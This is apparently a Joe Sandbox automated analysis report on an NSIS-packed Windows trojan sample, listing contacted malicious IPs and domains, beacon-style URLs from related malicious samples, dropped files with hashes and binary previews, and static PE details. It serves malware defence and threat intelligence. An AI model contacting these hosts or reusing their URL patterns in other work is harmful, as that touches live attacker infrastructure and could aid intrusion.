                                                              http://www.fonts.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://dfltweb1.onamae.comhelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.sakkal.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  184.175.83.64
                                                                  		middreampostal.comUnited States
                                                                  		7393CYBERCONUStrue
                                                                  185.224.138.83
                                                                  		bancambios.networkGermany
                                                                  		47583AS-HOSTINGERLTtrue
                                                                  119.81.95.146
                                                                  		purpleqube.comSingapore
                                                                  		36351SOFTLAYERUStrue
                                                                  184.168.131.241
                                                                  		oceancollaborative.comUnited States
                                                                  		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                  154.215.150.183
                                                                  		www.thechandeck.comSeychelles
                                                                  		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                  150.95.255.38
                                                                  		www.xn---yado-8e4dze0c.siteJapan7506INTERQGMOInternetIncJPtrue

                                                                  General Information

                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                  Analysis ID:433074
                                                                  Start date:11.06.2021
                                                                  Start time:08:52:39
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 10m 10s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:5t2CmTUhKc.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:25
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@8/4@11/6
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 25.6% (good quality ratio 23.3%)
                                                                  • Quality average: 76.4%
                                                                  • Quality standard deviation: 30.6%
                                                                  HCA Information:
                                                                  • Successful, ratio: 90%
                                                                  • Number of executed functions: 101
                                                                  • Number of non-executed functions: 182
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 52.255.188.83, 204.79.197.200, 13.107.21.200, 168.61.161.212, 92.122.145.220, 104.43.139.144, 20.50.102.62, 20.54.104.15, 20.54.26.129, 92.122.213.247, 92.122.213.194, 23.218.208.56, 20.82.210.154
                                                                  • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  185.224.138.83Updated April SOA.xlsxGet hashmaliciousBrowse
                                                                  • www.solocubiertos.com/hx3a/?BDH=h8HIR/JRNjzDsSWIWUzNg2gIEcYDeeAucgYL/MnDjD1L6VW+knLzJM/v5Dkqg23ga+J5Og==&SH6=u2JtglFH
                                                                  119.81.95.146a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                  • www.purpleqube.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtblLbpk+rZ/5L
                                                                  184.168.131.241DNPr7t0GMY.exeGet hashmaliciousBrowse
                                                                  • www.thriveglucose.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6
                                                                  5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                  • www.centerstageacademyaz.com/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr
                                                                  AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                  • www.centerstageacademyaz.com/hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U
                                                                  #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                  • www.mnanoramaonline.com/dp3a/?6l6x=JpPDbdpPqJah&F4ClVX_=HMSedmBm6/hIWbSmMxUxYZbRrtDTwFsk+TyYRjGVNzdErelZVoFwy82MvW0W4Pxo5ExE
                                                                  Payment receipt MT103.exeGet hashmaliciousBrowse
                                                                  • www.2006almadenrd.com/n86i/?3fDpH=EncZcG68c0UFvrfaep8p5kHr59rKeBqDHDmJoTlHDlH5Q19q6THcE1BV1jQP2/4tmveZ&Vjo=1bT0vz7
                                                                  New Order.exeGet hashmaliciousBrowse
                                                                  • www.flockuplabs.com/uqf5/?mVS=CH5D6h5PGn4ts&3fCDL=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/ArNV1zcwD6YY
                                                                  NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                                                  • www.cohorsetrails.com/j7e/?iP_T-V=s4TxBF2&F8EdvhY=0uFKBmvmOY3N1cR6tfDjvpZ4XCwo5tCp3URJWx4vIEcYZHH/ZYklCf5hgzXfIPGP0WLm
                                                                  oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                                                  • www.covid-19-411.com/c6ss/?P6AT72s=DB71Bym9Rr14TfwtieeaSq+XP6MPPP3k6OJ3eYsEhcCNhSwkByfhm8SfoYhSpsTVm4Za&j6A4qv=gJBt3
                                                                  qXDtb88hht.exeGet hashmaliciousBrowse
                                                                  • www.thriveglucose.com/p2io/?Z8E=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6&b0GDi6=Q6Ahtfox
                                                                  a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                  • www.oceancollaborative.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOeXG6ZsHsCfG
                                                                  Telex_Payment.exeGet hashmaliciousBrowse
                                                                  • www.avaatraelegant.com/m3rc/?hTk8tpm=TSQTGbGl+UafldaDY7iOrPnVdHYt9Ypfw/QiU1mtcNJ1KwINQbFG4EVzsaDm0ZQusGTd&I4=5jxX5BaX4hy8-j8
                                                                  QyKNw7NioL.exeGet hashmaliciousBrowse
                                                                  • www.thriveglucose.com/p2io/?m4=PditjTvx4PwX_x-&aBd=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9YuKFK/aPa09
                                                                  Payment_Advice.exeGet hashmaliciousBrowse
                                                                  • www.ingenious.care/uqf5/?9rw=IyvMBxqM8mznciPJtkomKlfF/kq/6zAZ/NulsdYJ5cntVs/S9fIvdvtMsAQ76USE273s&s6=bPYXfd3Xq0VHDp
                                                                  SOA #093732.exeGet hashmaliciousBrowse
                                                                  • www.xn--arepasantabrbara-pmb.com/hme1/?jPw=2SPw7LQlaa7cti3Mn2rz6TCjd7lU8jHnPITUh2R4n2dBA+x2SVgAgss/958kYo9ATjis&y2JhS=6lr41hZpgNXtF
                                                                  rHk5KU7bfT.exeGet hashmaliciousBrowse
                                                                  • www.rvvikings.com/dxe/?TfTl=jHjQ1sEHwNXw4n+A/8fpKnaO6SpchAkuZ+GgFHi7AN8kb2XA0i8OmoFepGcQzHHYqc9c&7nGt5=h6Altfix
                                                                  Order.exeGet hashmaliciousBrowse
                                                                  • www.complexscale.net/jogt/?w6ATB0=mM0Ck4zU/d9hG5lVEWeH7uQPwyvlCbjgstqvdurAh1ZdTH4Yqc2sgGmD0X7Q/SemRdxv&Jxox=Er6tXhMxl
                                                                  VubYcOdGjQ.exeGet hashmaliciousBrowse
                                                                  • www.theguyscave.com/k8n/?wR-T-=ETYdeRC&5jn=ffRSpgj0URUgPhDkzfA3YdlDQQz5pJJRybkyQxcySljT84fGDbAnWSnhJv/zp2N19SZb
                                                                  Payment_Advice.exeGet hashmaliciousBrowse
                                                                  • www.getthistle.com/q4kr/?w2MLb=6lux&QtRl=Jt1JO2t971959LrdDM/EJ1cvA97Pwm/HDqPg7v3P69I8XU+CUZlUHoU2RjaRLLQwrinB
                                                                  Neworder.exeGet hashmaliciousBrowse
                                                                  • www.kanitanaillounge.com/jogt/?PlQ8j=jKXq1ZQHcPBM/dFmsG96Rrq7SiC5kuIPSSiD8Dd2ip+Nb1yUpyUL4OnIzbOoJzgaBXqf&2db=g0G0iLxxPHIT
                                                                  Request for Price W912D2-19-Q-0004.exeGet hashmaliciousBrowse
                                                                  • www.blackwomencamp.net/egem/?2dCHQ=s0ILlWrMQzsGp3p1RmAY3qUukEAkmJAYYPkleJQvQBxBfoOdmLxTHansmvlw5WkCayf3&7nDtA=f2JDOtyx2xtDzteP

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  CYBERCONUSsample.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  tS9P6wPz9x.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  ransomware.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  ransomware.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  gc79a7rUNV.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  CONSTANTINE.xlsxGet hashmaliciousBrowse
                                                                  • 216.15.213.195
                                                                  08142020_1463075702.docGet hashmaliciousBrowse
                                                                  • 66.201.98.191
                                                                  http://srconsultingsrv.com/wp-admin/open-9c-pqmgpgy9fo4mnwz/verifiable-area/10bpikjgd-32105y0ut8/Get hashmaliciousBrowse
                                                                  • 184.175.123.49
                                                                  SecuriteInfo.com.W97m.Downloader.IWY.30727.docGet hashmaliciousBrowse
                                                                  • 216.198.213.62
                                                                  SecuriteInfo.com.W97m.Downloader.IWY.30727.docGet hashmaliciousBrowse
                                                                  • 216.198.213.62
                                                                  AS-HOSTINGERLTProforma Inv.xlsxGet hashmaliciousBrowse
                                                                  • 156.67.222.136
                                                                  qXDtb88hht.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  8mnXkjPdP0.exeGet hashmaliciousBrowse
                                                                  • 46.17.172.65
                                                                  SecuriteInfo.com.Scr.Malcodegdn30.8880.exeGet hashmaliciousBrowse
                                                                  • 2.57.89.36
                                                                  Shipping Docs677.exeGet hashmaliciousBrowse
                                                                  • 31.170.161.109
                                                                  item.exeGet hashmaliciousBrowse
                                                                  • 45.13.255.9
                                                                  RFQ_BRAT_METAL_TECH_LTD.exeGet hashmaliciousBrowse
                                                                  • 45.13.255.9
                                                                  POSWM240521.exeGet hashmaliciousBrowse
                                                                  • 45.13.255.9
                                                                  XmN6faVV2b.exeGet hashmaliciousBrowse
                                                                  • 193.168.194.233
                                                                  fbfcbf13_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 46.17.172.35
                                                                  EJIMS.exeGet hashmaliciousBrowse
                                                                  • 45.130.231.56
                                                                  bin.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                                  • 185.201.11.161
                                                                  netwire.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  O64Hou5qAF.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  PurchaseOrder#657Y200.exeGet hashmaliciousBrowse
                                                                  • 2.57.89.36
                                                                  noSpfWQqRD.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  94f0319a_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 194.59.164.91
                                                                  0e12ea4a_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                  • 195.110.59.2
                                                                  WLApa6bpDLcT5Ne.exeGet hashmaliciousBrowse
                                                                  • 46.17.172.65
                                                                  SOFTLAYERUSRef#Doc30504871 Wyg.htmGet hashmaliciousBrowse
                                                                  • 169.55.190.245
                                                                  7 #U039c#U0456#U0455#U0455#U0435d #U0441#U0430II#U0455.htmGet hashmaliciousBrowse
                                                                  • 169.46.118.100
                                                                  ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                  • 159.253.128.188
                                                                  06.08.21 Inv & AP Statement - Copy.htmGet hashmaliciousBrowse
                                                                  • 169.46.89.154
                                                                  Payment slip.exeGet hashmaliciousBrowse
                                                                  • 169.56.29.200
                                                                  a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                  • 119.81.95.146
                                                                  Windows Defender#U68c0#U67e5#U5de5#U5177.exeGet hashmaliciousBrowse
                                                                  • 50.23.197.95
                                                                  #U266b Audio_47920.wavv - - Copy.htmlGet hashmaliciousBrowse
                                                                  • 169.47.124.25
                                                                  BS.exeGet hashmaliciousBrowse
                                                                  • 103.226.228.233
                                                                  American Freight Payment Advice.htmlGet hashmaliciousBrowse
                                                                  • 169.47.124.25
                                                                  EASTWAY COMNAGA SB PAYMENT BANK IN SLIP 250521_PDF.exeGet hashmaliciousBrowse
                                                                  • 192.253.242.6
                                                                  de725d13_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 50.23.197.95
                                                                  $RAULIU9.exeGet hashmaliciousBrowse
                                                                  • 198.252.103.41
                                                                  Receipt565647864.htmlGet hashmaliciousBrowse
                                                                  • 158.177.118.97
                                                                  350969bc_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 119.81.45.82
                                                                  Open_Invoice_and_statements.htmGet hashmaliciousBrowse
                                                                  • 158.176.79.200
                                                                  2x93jpW0Ac.dmgGet hashmaliciousBrowse
                                                                  • 108.168.175.167
                                                                  4wHhXGk3b9.dmgGet hashmaliciousBrowse
                                                                  • 108.168.175.167
                                                                  networkservice.exeGet hashmaliciousBrowse
                                                                  • 69.56.135.212
                                                                  6544THReceipt56GFHD.htmlGet hashmaliciousBrowse
                                                                  • 158.177.118.97

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                                    New Order PO2193570O1.docGet hashmaliciousBrowse
                                                                      L2.xlsxGet hashmaliciousBrowse
                                                                        Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                          New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                            2320900000000.exeGet hashmaliciousBrowse
                                                                              CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                                5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                                  i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                                    AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                                      090049000009000.exeGet hashmaliciousBrowse
                                                                                        dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                                                          PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                                            Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                                              Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                                                                  Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                    3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                      Shipping receipt.exeGet hashmaliciousBrowse
                                                                                                        New Order TL273723734533.pdf.exeGet hashmaliciousBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Temp\liw53s6e5g55t9
                                                                                                          Process:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):164864
                                                                                                          Entropy (8bit):7.998820292327425
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Qqr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4S:drlEXrPB2EtLTvbh21eq4S
                                                                                                          MD5:68A3F57B8B343B5F9BF05C9F35A086A3
                                                                                                          SHA1:29015249F259A9AAF76D3AD6774019CFBBD118FD
                                                                                                          SHA-256:D2D0C6EC98898B2B21BE258090B267AA98A5C4FEA808B37DC7BBAF38B900246F
                                                                                                          SHA-512:36538D7036BB092DC2E126387DAE328FB68EA53D3D7F8F3126AA986117EC569B32F11EC925192F75C1C7FA225BAF1C4BA88551F1AAF860444139E4A8ECC68B33
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: Q.Uc5.0..@..C6.,.(.../7...1.H]..$9.p.].#.|......?.2.e.$..3p....:.Dt .<...[...=.kJ.p(|Y.#I:Eq.....T...!);A......u.t.....*....IZo..z..2..S...h.pu.&.?.]....U.@9*.V.:.......d.-..........C..I.8...8nZ..k.....jRY..../.P.....a...h..\.{gv.m22........r..8g....A..<....I.N.L..LB+.A.|..9........l.L..'...>aQ6..K.|.^P..%.Hu.{.....c^.....r..>.X.j6+/.1..E#m../.x....h..<.#.p.G...!..p.~.H.SL..%...j.Cg.}V....p....:..z.-H.....%57`.._I..........l.....,x .jU....<.h-6L..."-yy...X.KA.$YT......z.$].R..>..M@q.)...6F.v27|l.4.@b!.h.I6{@.%..aP.~..HcX..%.<.h../.A....;.....:..X.Na....A.s,:..&..F..q..'.r.(!,..p.^..+.......F..%.?..>......c.e........Y......A@}....Ke..W{j.^?.xnD.I.g......,.....`...b.....yu.6.]....ud.U.z.1.?@-..6u.-.`..K*..$.T9J..bo....K.WA ....,:.Sd[Iz#.txD..)...v.....}.....]..4L.....^...:B....4|..sM..Q..2....mK...>.D~....+8[?.=.9..X!r.4.......~..c.!d}...hR&ee.`..... ......d....G..G...k..}...._#G..O..{....hw....s23p....-v.5...p.......,...F.^W....T..P".
                                                                                                          C:\Users\user\AppData\Local\Temp\nse5FE9.tmp
                                                                                                          Process:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):261211
                                                                                                          Entropy (8bit):7.359115600393562
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:7Sa/qr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4l20fjumGLPNt:WaSrlEXrPB2EtLTvbh21eq4V7LGLFt
                                                                                                          MD5:AB8B0B65B223CDF58819B06790B548E2
                                                                                                          SHA1:0B678EAD9F82893461CC99EF27BEF78A3F3115F8
                                                                                                          SHA-256:205ACFB8E6DCF7203E2CE11F386D70851ABA48F2D7FF011A0B750E8092F94D29
                                                                                                          SHA-512:FA39DFB9E056C2EFFB8C1F28339C9A7487C3239E2042E8DFE7ECD87FC510A32824B1A5AADF98BFA57B3039736AB8317241453FB6BB6DAAE7208FC64A685125CB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: .m......,.......................LP......$l.......l..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll
                                                                                                          Process:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11776
                                                                                                          Entropy (8bit):5.855045165595541
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                          MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                          SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                          SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                          SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                                          • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                                          • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                                          • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                                          • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                                          • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                                          • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                                          • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                                          • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                                          • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                                          • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                                          • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                                          • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                                          • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                          • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                                          • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                          • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                          • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                          • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\Temp\xpwbfoj
                                                                                                          Process:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56641
                                                                                                          Entropy (8bit):4.976767365562505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:Y3DnyBc/8CaRs3+Z06O2vxZODPqSjlr7GBOEEjHzYtfgcBGUePl72zvHzUfysnp3:i4opae+Z0z0wr7G3EjT8cd72DUpGLu
                                                                                                          MD5:92B8B4963350C3A198E9513D086FBB3C
                                                                                                          SHA1:8B365235930D9864D7CA3D3A8B67E61D314EA560
                                                                                                          SHA-256:7CE31FC69C94A1917273EB7BF938EFB0BA57EDA5281E20BE8EF13E7D8BA302F9
                                                                                                          SHA-512:75C83B2DCE7EB57B059FA4C9C50A7F308CD2521868EB83011F15C51E96489C15E987D72B0907BF59698924140306D6348578BF114CABB0A0C1A86FC033FE02C1
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: U...........D.....E...B.F.....G.....H.....I.....J...?.K.....L.....M...v.N.....O.....P.....Q...?.R.....S...5.T.....U...p.V.....W.....X.....Y...7.Z.....[...P.\.....]...{.^....._...|.`.....a.....b.....c.....d...A.e.....f.....g...=.h.....i...T.j...7.k...1.l...|.m.....n...(.o.....p...?.q.....r...T.s...z.t.....u.....v...?.w.....x...T.y.....z...=.{.....|...T.}...?.~.........|...........=...........|.................{...........t.............................A.....9.............................=...........x.....7.....1.....t...........(...........?...........x.....z.................?...........x...........=...........x.....?...........t...........=...........t.................{...........l.............................A.....9.............................=...........p.....7.....1.....l...........(...........?...........p.....z.................?...........p

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.913752075626111
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:5t2CmTUhKc.exe
                                                                                                          File size:225177
                                                                                                          MD5:116e736ba00fca4b8499c4df00796454
                                                                                                          SHA1:a8d3d62db4bd49e24c2bda3d0d81c3be25a81dae
                                                                                                          SHA256:096ca35528ef4f702e93f5f17d7954f26fb48acd4526794ce1ee99d27cf1a4c3
                                                                                                          SHA512:02ddab82dd68faa0627c15320de3e0b118b1cc95fee80fc013e57ed773a9420af5b23f3bb7f9ccac216c88581b665db29bd1ca5e03f7e0b52f9c542d75b57f78
                                                                                                          SSDEEP:3072:DQIURTXJ+MwMy2ZeD0EUquupJDoeGgFq+HAgDtI7LXZ2sQYvvlIieO82WbyXVvE4:Ds9wMReDph9AOI7LXosQQBBFsuyQUvnk
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                          File Icon

                                                                                                          Icon Hash:b2a88c96b2ca6a72

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x40323c
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
